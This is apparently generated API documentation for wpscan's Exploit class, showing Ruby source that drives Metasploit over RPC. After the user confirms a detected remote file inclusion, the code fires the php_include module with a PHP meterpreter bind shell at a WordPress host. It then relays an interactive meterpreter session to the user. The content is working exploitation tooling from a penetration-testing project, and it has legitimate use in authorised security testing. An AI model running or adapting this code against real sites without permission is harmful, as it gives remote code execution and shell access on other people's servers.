Parent

Object

Files

Exploit

This library should contain all methods for exploitation.

Attributes

postdata[RW]
rhost[RW]
type[RW]
uri[RW]

Public Class Methods

new(wp_url, type, uri, postdata, use_proxy, proxy_addr, proxy_port) click to toggle source 
# File lib/wpscan/exploit.rb, line 27
def initialize(wp_url, type, uri, postdata, use_proxy, proxy_addr, proxy_port)
  @wp_url = URI.parse(wp_url.to_s)
  @rhost = @wp_url.host
  @path = @wp_url.path
  @type = type
  @uri = uri
  @postdata = postdata
  @session_in_use = nil
  @use_proxy = use_proxy
  @proxy_addr = proxy_addr
  @proxy_port = proxy_port
  start()
end

Public Instance Methods

choose_session() click to toggle source

if there is more than 1 session, allow the user to choose one.

# File lib/wpscan/exploit.rb, line 148
def choose_session()
  if session_count() >= 2
    puts "[?] We have " + session_count().to_s + " sessions running. Please choose one by id."
    open_sessions = ""
    sessions.keys.each do |open_session|
      open_sessions += open_session.to_s + " "
    end
    puts open_sessions
    use_session = Readline.readline
    puts "Using session " + use_session.to_s
    @session_in_use = use_session
  else
    puts "Using session " + last_session_id().to_s
    @session_in_use = last_session_id()
  end
end
exploit(msf_module, payload) click to toggle source

exploit

# File lib/wpscan/exploit.rb, line 61
def exploit(msf_module, payload)

  exploit_info(msf_module,payload)

  if @postdata == ""
    result = RpcClient.new.exploit(msf_module, {:RHOST => @rhost,:PATH => @path,:PHPURI => @uri,:PAYLOAD => payload})
  else
    result = RpcClient.new.exploit(msf_module, {:RHOST => @rhost,:PATH => @path,:PHPURI => @uri,:POSTDATA => @postdata, :PAYLOAD => payload})
  end

  if result['result'] == "success"
    puts "[*] Exploit worked! Waiting for a session..."

    session_spawn_timer = Time.new
    while sessions.nil? or sessions.empty?
      # wait for a session to spawn with a timeout of 1 minute
      if (Time.now - session_spawn_timer > 60)
        puts "[ERROR] Session was not created... exiting."
        return false
      end
    end

    choose_session()

    input = nil
    while input.nil?
      puts meterpreter_read(last_session_id())
      input = Readline.readline
      if input == "exit"
        kill_session(@session_in_use)
        return false
      end
      meterpreter_write(last_session_id(), input)
      input = nil
    end

  else
    puts "[ERROR] Exploit failed! :("
    return false
  end
end
exploit_info(msf_module,payload) click to toggle source

output our exploit data

# File lib/wpscan/exploit.rb, line 105
def exploit_info(msf_module,payload)
  info = RpcClient.new.get_exploit_info(msf_module)
  puts
  puts "| [EXPLOIT]"
  puts "| Name: " + info['name']
  puts "| Description: " + info['description'].gsub!("\t", "").gsub!("\n\n","\n").gsub!("\n", "\n| ").chop!
  puts "| [OPTIONS]"
  puts "| RHOST: " + @rhost
  puts "| PATH: " + @path
  puts "| URI: " + uri
  puts "| POSTDATA: " + @postdata if @postdata != ""
  puts "| Payload: " + payload
  puts
end
job_id() click to toggle source

not sure if this is needed?! not used.

# File lib/wpscan/exploit.rb, line 122
def job_id()
  jobs = RpcClient.new.jobs()
  puts jobs
end
kill_session(id) click to toggle source

kill a session by session id

# File lib/wpscan/exploit.rb, line 167
def kill_session(id)
  begin
    killed = RpcClient.new.kill_session(id)
    if killed['result'] == "success"
      puts "[-] Session " + id.to_s + " killed."
    end
  rescue
    puts "[] Session " + id.to_s + " does not exist."
    return false
  end
end
last_session_id() click to toggle source

the last active session id created

# File lib/wpscan/exploit.rb, line 135
def last_session_id()
  sessions.keys.last
end
meterpreter_read(id) click to toggle source

read data from a meterpreter session data must be base64 decoded.

# File lib/wpscan/exploit.rb, line 196
def meterpreter_read(id)
  Base64.decode64(RpcClient.new.meterpreter_read(id)['data'])
end
meterpreter_write(id, data) click to toggle source

write data to a meterpreter session data must be base64 encoded.

# File lib/wpscan/exploit.rb, line 203
def meterpreter_write(id, data)
  RpcClient.new.meterpreter_write(id, Base64.encode64(data))
end
read_shell(id) click to toggle source

read data from a shell, meterpreter is not classed as a shell.

# File lib/wpscan/exploit.rb, line 182
def read_shell(id)
  RpcClient.new.read_shell(id)['data']
end
session_count() click to toggle source

a count of the amount of active sessions

# File lib/wpscan/exploit.rb, line 141
def session_count()
  sessions().size
end
sessions() click to toggle source

all sessions and related session data

# File lib/wpscan/exploit.rb, line 129
def sessions()
  sessions = RpcClient.new.sessions()
end
start() click to toggle source

figure out what to exploit

# File lib/wpscan/exploit.rb, line 43
def start()
  if @type == "RFI"
    puts
    puts "[?] Exploit? [y/n]"
    answer = Readline.readline
    if answer =~ /^y/
      msf_module = "exploit/unix/webapp/php_include"
      payload = "php/meterpreter/bind_tcp"
      exploit(msf_module, payload)
    else
      return false
    end
  elsif @type == "SQLI"
  end
end
write_shell(id, data) click to toggle source

write data to a shell, meterpreter is not classed as a shell.

# File lib/wpscan/exploit.rb, line 189
def write_shell(id, data)
  RpcClient.new.write_shell(id, data)
end

[Validate]

Generated with the Darkfish Rdoc Generator 2.